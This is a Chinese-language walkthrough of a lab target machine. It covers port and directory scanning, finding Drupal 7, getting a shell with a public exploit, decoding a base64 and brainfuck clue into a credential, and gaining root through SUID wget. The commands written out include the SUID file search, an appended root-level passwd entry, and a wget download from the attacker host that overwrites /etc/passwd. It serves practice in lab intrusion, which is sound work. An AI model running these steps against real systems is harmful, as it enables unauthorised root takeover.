靶機地址:172.16.1.198(或112) kali地址:172.16.1.108
1 信息收集
靶機界面如下
簡單查看
OS:Ubuntu
Web:Apache2.4.18
嘗試端口掃描
開放22/80
嘗試目錄掃描,發現drupal目錄
再次查看相關信息
發現cms為drupal 7,暫不確定版本。
再次對http://172.16.1.112/drupal進行目錄掃描
發現robot.txt等文件
查看目錄文件,發現cms疑似版本
2 漏洞發現與利用
使用Kali搜索漏洞exp
使用第四個
獲取shell
python3 -c “import pty;pty.spawn('/bin/bash')”
3 權限提升
網站根目錄發現文件
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==
base64解密:
+++++ +++++ [->++ +++++ +++<] >++++ ++.-- ----- --.<+ ++[-> +++<] >+++.
----- ---.< +++[- >+++< ]>+++ ++.<+ +++++ +[->- ----- -<]>- ----- --.<+
++[-> +++<] >++++ +.<++ +++[- >++++ +<]>. ++.++ +++++ +.--- ---.< +++[-
>+++< ]>+++ +.<++ +++++ [->-- ----- <]>-. <+++[ ->--- <]>-- -.+.- ---.+
++.<
brainfuck加密后的字符串,在線解密
https://www.splitbrain.org/services/ook
james:Hacker@451
好像沒用。。。
bae11ce4f67af91fa58576c1da2aad4b 無法解密
嘗試提權
網上搜索,通過suid提權
查找特權文件命令
find / -perm -u=s -type f 2>/dev/null
嘗試使用wget,替換/etc/passwd
先生成密碼
$1$xxpp$G9EIoPGzWplWuW2eoo8sB0
Kali下載文件passwd ,把 寫入xp 為root權限
echo 'xp:$1$xp$WAsIecX.f3vb95RxIgAHg/:0:0:root:/root:/bin/bash' >> passwd
替換passwd文件
使用wget -O命令替代靶機原來的passwd文件(suid提權意義所在)
wget http://172.16.1.108:8000/passwd -O passwd
查看(寫入成功)
更改用戶,登錄成功
完成提權!!